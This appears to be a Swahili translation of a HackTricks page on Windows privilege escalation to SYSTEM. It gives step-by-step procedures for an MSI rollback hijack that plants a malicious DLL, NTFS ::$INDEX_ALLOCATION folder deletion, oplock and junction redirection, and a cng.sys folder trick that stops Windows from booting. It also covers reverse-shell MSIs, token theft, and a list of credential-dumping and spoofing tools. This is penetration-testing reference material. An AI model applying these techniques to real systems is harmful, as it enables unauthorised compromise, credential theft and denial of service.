Kisha soma hii ili ujifunze kuhusu UAC na UAC bypasses:

UAC - User Account Control

From Arbitrary Folder Delete/Move/Rename to SYSTEM EoP

The technique described in this blog post with a exploit code available here.

Shambulio hili kwa msingi linajumuisha kutumia kipengele cha rollback cha Windows Installer kubadilisha faili halali na zenye madhara wakati wa mchakato wa uninstall. Kwa hili mshambuliaji anahitaji kuunda malicious MSI installer ambayo itatumika ku-hijack folda ya C:\Config.Msi, ambayo baadaye Windows Installer itatumia kuhifadhi rollback files wakati wa uninstall ya vifurushi vingine vya MSI ambapo faili za rollback zingekuwa zimebadilishwa kuwa na payload yenye madhara.

Mbinu iliyosummarize ni ifuatayo:

Stage 1 – Preparing for the Hijack (leave C:\Config.Msi empty)

Step 1: Install the MSI
Tengeneza .msi inayoweka faili isiyoharibu (mfano, dummy.txt) kwenye folda inayoweza kuandikwa (TARGETDIR).
Taja installer kama "UAC Compliant", ili non-admin user aweze kuikimbia.
Weka handle wazi kwa faili baada ya install.
Step 2: Begin Uninstall
Uninstall .msi ile ile.
Mchakato wa uninstall unaanza kusogeza faili kwenda C:\Config.Msi na kuya-reame kuwa .rbf files (rollback backups).
Poll the open file handle kwa kutumia GetFinalPathNameByHandle ili kugundua wakati faili inakuwa C:\Config.Msi\<random>.rbf.
Step 3: Custom Syncing
.msi ina custom uninstall action (SyncOnRbfWritten) ambayo:
Inaonyesha wakati .rbf imeandikwa.
Kisha inangoja kwenye event nyingine kabla ya kuendelea na uninstall.
Step 4: Block Deletion of .rbf
Wakati imetangazwa, fungua faili ya .rbf bila FILE_SHARE_DELETE — hii inazuia kufutwa kwake.
Kisha tuma ishara nyuma ili uninstall iendelee.
Windows Installer inashindwa kufuta .rbf, na kwa sababu haifuti yaliyomo yote, C:\Config.Msi haifutiliwi.
Step 5: Manually Delete .rbf
Wewe (mshambuliaji) unafuta .rbf kwa mkono.
Sasa C:\Config.Msi iko tupu, tayari ku-hijackiwa.

At this point, trigger the SYSTEM-level arbitrary folder delete vulnerability to delete C:\Config.Msi.

Stage 2 – Replacing Rollback Scripts with Malicious Ones

Step 6: Recreate C:\Config.Msi with Weak ACLs
Rekreti folda ya C:\Config.Msi wewe mwenyewe.
Weka weak DACLs (mfano, Everyone:F), na weka handle wazi na WRITE_DAC.
Step 7: Run Another Install
Install .msi tena, na:
TARGETDIR: Mahali la kuandika.
ERROROUT: Variable inayosababisha failure iliyofikiriwa.
Install hii itatumika kusababisha rollback tena, ambayo inasoma .rbs na .rbf.
Step 8: Monitor for .rbs
Tumia ReadDirectoryChangesW kufuatilia C:\Config.Msi hadi .rbs mpya ionekane.
Chukua jina la faili yake.
Step 9: Sync Before Rollback
.msi ina custom install action (SyncBeforeRollback) ambayo:
Inaonyesha event wakati .rbs imetengenezwa.
Kisha inangoja kabla ya kuendelea.
Step 10: Reapply Weak ACL
Baada ya kupokea event ya .rbs created:
Windows Installer inarudisha strong ACLs kwa C:\Config.Msi.
Lakini kwa kuwa bado una handle na WRITE_DAC, unaweza kureapply weak ACLs tena.

ACLs are only enforced on handle open, hivyo bado unaweza kuandika kwenye folda.

Step 11: Drop Fake .rbs and .rbf
Overwrite faili ya .rbs kwa fake rollback script inayosema Windows:
Rudisha .rbf yako (malicious DLL) katika mahali lenye privileges (mfano, C:\Program Files\Common Files\microsoft shared\ink\HID.DLL).
Weka .rbf feki inayojumuisha malicious SYSTEM-level payload DLL.
Step 12: Trigger the Rollback
Tuma ishara ya sync ili installer iendelee.
A type 19 custom action (ErrorOut) imewekwa kusababisha installer kushindwa kwa makusudi mahali pa kujulikana.
Hii inasababisha rollback kuanza.
Step 13: SYSTEM Installs Your DLL
Windows Installer:
Inasoma .rbs yako yenye ubaya.
Inakopia .rbf DLL yako kwenye eneo lengwa.
Sasa una malicious DLL katika njia inayopakiwa na SYSTEM.
Final Step: Execute SYSTEM Code
Endesha binary inayoaminiwa na auto-elevated (mfano, osk.exe) ambayo inapakia DLL uliyohijack.
Boom: Msimbo wako unaendeshwa kama SYSTEM.

From Arbitrary File Delete/Move/Rename to SYSTEM EoP

The main MSI rollback technique (the previous one) assumes you can delete an entire folder (e.g., C:\Config.Msi). But what if your vulnerability only allows arbitrary file deletion ?

Unaweza kutumia NTFS internals: kila folda ina hidden alternate data stream inayoitwa:

C:\SomeFolder::$INDEX_ALLOCATION

Mtiririko huu unahifadhi metadata ya faharasa ya folda.

Kwa hivyo, ikiwa unafuta mtiririko ::$INDEX_ALLOCATION wa folda, NTFS huondoa folda yote kabisa kutoka kwenye mfumo wa faili.

Unaweza kufanya hivi kwa kutumia API za kawaida za kufuta faili kama:

DeleteFileW(L"C:\\Config.Msi::$INDEX_ALLOCATION");

Ingawa unapoita file delete API, inafuta folda yenyewe.

Kutoka Folder Contents Delete hadi SYSTEM EoP

Je, primitive yako hairuhusu kufuta faili/folda yoyote, lakini inaruhusu kufutwa kwa maudhui ya attacker-controlled folder?

Hatua 1: Sanidi folda ya mtego na faili

Unda: C:\temp\folder1
Ndani yake: C:\temp\folder1\file1.txt

Hatua 2: Weka oplock kwenye file1.txt

Oplock hiyo inasimamisha utekelezaji wakati mchakato wenye vibali unajaribu kufuta file1.txt.

// pseudo-code
RequestOplock("C:\\temp\\folder1\\file1.txt");
WaitForDeleteToTriggerOplock();

Hatua 3: Washa mchakato wa SYSTEM (kwa mfano, SilentCleanup)

Mchakato huu hupitia folda (kwa mfano, %TEMP%) na hujaribu kufuta yaliyomo ndani yao.
Inapofika kwenye file1.txt, oplock inachochea na inatoa udhibiti kwa callback yako.

Hatua 4: Ndani ya callback ya oplock – elekeza upya ufutaji

Chaguo A: Hamisha file1.txt mahali pengine
Hii inafanya folder1 kuwa tupu bila kuvunja oplock.
Usifute file1.txt moja kwa moja — hilo lingeachilia oplock mapema.
Chaguo B: Geuza folder1 kuwa junction:

bash

# folder1 is now a junction to \RPC Control (non-filesystem namespace)
mklink /J C:\temp\folder1 \\?\GLOBALROOT\RPC Control

Chaguo C: Unda symlink katika \RPC Control:

bash

# Make file1.txt point to a sensitive folder stream
CreateSymlink("\\RPC Control\\file1.txt", "C:\\Config.Msi::$INDEX_ALLOCATION")

Hii inalenga mtiririko wa ndani wa NTFS unaohifadhi metadata ya kabrasha — kuifuta kunafuta kabrasha.

Hatua 5: Kuachilia oplock

Mchakato wa SYSTEM unaendelea na unajaribu kufuta file1.txt.
Lakini sasa, kutokana na junction + symlink, kwa kweli inafuta:

C:\Config.Msi::$INDEX_ALLOCATION

Matokeo: C:\Config.Msi imefutwa na SYSTEM.

Kutoka Arbitrary Folder Create hadi DoS ya kudumu

Tumia primitive inayokuwezesha create an arbitrary folder as SYSTEM/admin — hata kama huwezi kuandika faili au kusanidi ruhusa dhaifu.

Unda kabrasha (si faili) lenye jina la critical Windows driver, kwa mfano:

C:\Windows\System32\cng.sys

Njia hii kawaida inalingana na driver wa kernel-mode cng.sys.
Ikiwa utaiunda mapema kama folda, Windows itashindwa kupakia driver halisi wakati wa kuanzisha.
Kisha, Windows inajaribu kupakia cng.sys wakati wa kuanzisho.
Inaiona folda, inashindwa kupata driver halisi, na inaanguka (crash) au kusimamisha kuanzisho.
Hakuna mbadala, na hakuna urejeshaji bila uingiliaji wa nje (kwa mfano, ukarabati wa boot au upatikanaji wa diski).

Kutoka High Integrity hadi SYSTEM

Huduma mpya

Ikiwa tayari unaendesha mchakato wa High Integrity, njia hadi SYSTEM inaweza kuwa rahisi kwa kuunda na kuendesha huduma mpya:

sc create newservicename binPath= "C:\windows\system32\notepad.exe"
sc start newservicename

tip

Wakati wa kuunda service binary hakikisha ni service halali au kwamba binary inafanya vitendo vinavyohitajika haraka kwani itafutwa baada ya sekunde 20 ikiwa sio service halali.

AlwaysInstallElevated

Kutoka katika mchakato wa High Integrity unaweza kujaribu kuwezesha AlwaysInstallElevated registry entries na install reverse shell ukitumia wrapper ya .msi.
More information about the registry keys involved and how to install a .msi package here.

High + SeImpersonate privilege to System

You can find the code here.

From SeDebug + SeImpersonate to Full Token privileges

Ikiwa una token privileges hizo (huenda utazipata katika mchakato uliopo tayari wa High Integrity), utaweza kufungua karibu mchakato wowote (sio protected processes) kwa kutumia SeDebug privilege, kunakili token ya mchakato, na kuunda mchakato wowote kwa kutumia token hiyo.
Katika mbinu hii kwa kawaida hutumika kuchagua mchakato unaoendesha kama SYSTEM wenye token privileges zote (ndio, unaweza kupata SYSTEM processes zisizo na token privileges zote).
You can find an example of code executing the proposed technique here.

Named Pipes

Mbinu hii inatumiwa na meterpreter kwa kuongezeka kwa ruhusa katika getsystem. Mbinu inajumuisha kuunda pipe na kisha kuunda/kuudhi service ili kuandika kwenye pipe hiyo. Kisha, server iliyounda pipe kwa kutumia SeImpersonate privilege itaweza kuiga token ya pipe client (service) na kupata SYSTEM privileges.
If you want to learn more about name pipes you should read this.
If you want to read an example of how to go from high integrity to System using name pipes you should read this.

Dll Hijacking

Ikiwa unaweza kuhijack a dll inayopakiwa na process inayotekelezwa kama SYSTEM utaweza kutekeleza code yoyote kwa ruhusa hizo. Kwa hiyo Dll Hijacking pia ni muhimu kwa aina hii ya privilege escalation, na, zaidi ya hayo, ni rahisi zaidi kufikiwa kutoka kwa mchakato wa high integrity kwani utakuwa na write permissions kwenye folda zinazotumika kupakia dlls.
You can learn more about Dll hijacking here.

From Administrator or Network Service to System

From LOCAL SERVICE or NETWORK SERVICE to full privs

Read: https://github.com/itm4n/FullPowers

More help

Static impacket binaries

Useful tools

Best tool to look for Windows local privilege escalation vectors: WinPEAS

PrivescCheck
PowerSploit-Privesc(PowerUP) -- Angalia misconfigurations na faili nyeti (check here). Imegunduliwa.
JAWS -- Angalia baadhi ya misconfigurations na kukusanya info (check here).
privesc -- Angalia misconfigurations
SessionGopher -- Hutoka PuTTY, WinSCP, SuperPuTTY, FileZilla, na taarifa za RDP saved session. Tumia -Thorough katika mazingira ya local.
Invoke-WCMDump -- Hutoa credentials kutoka Credential Manager. Imegunduliwa.
DomainPasswordSpray -- Tumia nywila zilizokusanywa kwa password spraying kwenye domain
Inveigh -- Inveigh ni PowerShell ADIDNS/LLMNR/mDNS/NBNS spoofer na zana ya man-in-the-middle.
WindowsEnum -- Uorodheshaji wa msingi kwa privesc Windows
~~Sherlock~~ ~~~~ -- Tafuta privesc zinazojulikana (DEPRECATED for Watson)
~~WINspect~~ -- Ukaguzi wa local (Inahitaji haki za Admin)

Exe

Watson -- Tafuta privesc zinazojulikana (inahitaji ku-compile kwa VisualStudio) (precompiled)
SeatBelt -- Orodhesha host kutafuta misconfigurations (zaidi ni zana ya kukusanya info kuliko privesc) (inahitaji ku-compile) (precompiled)
LaZagne -- Hutoa credentials kutoka kwa programu nyingi (precompiled exe kwenye github)
SharpUP -- Port ya PowerUp kwenda C#
~~Beroot~~ ~~~~ -- Angalia misconfiguration (executable precompiled kwenye github). Haipendekezwi. Haifanyi kazi vizuri katika Win10.
~~Windows-Privesc-Check~~ -- Angalia misconfigurations zinazowezekana (exe kutoka python). Haipendekezwi. Haifanyi kazi vizuri katika Win10.

Bat

winPEASbat -- Zana iliyotengenezwa kwa msingi wa chapisho hili (haihitaji accesschk kufanya kazi vizuri lakini inaweza kuitumia).

Local

Windows-Exploit-Suggester -- Husoma output ya systeminfo na kupendekeza exploits zinazofanya kazi (python za local)
Windows Exploit Suggester Next Generation -- Husoma output ya systeminfo na kupendekeza exploits zinazofanya kazi (python za local)

Meterpreter

multi/recon/local_exploit_suggestor

You have to compile the project using the correct version of .NET (see this). Ili kuona toleo la .NET lililowekwa kwenye host wa mwathirika unaweza kufanya:

C:\Windows\microsoft.net\framework\v4.0.30319\MSBuild.exe -version #Compile the code with the version given in "Build Engine version" line

References

tip

Support HackTricks

Angalia mpango wa usajili!
Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.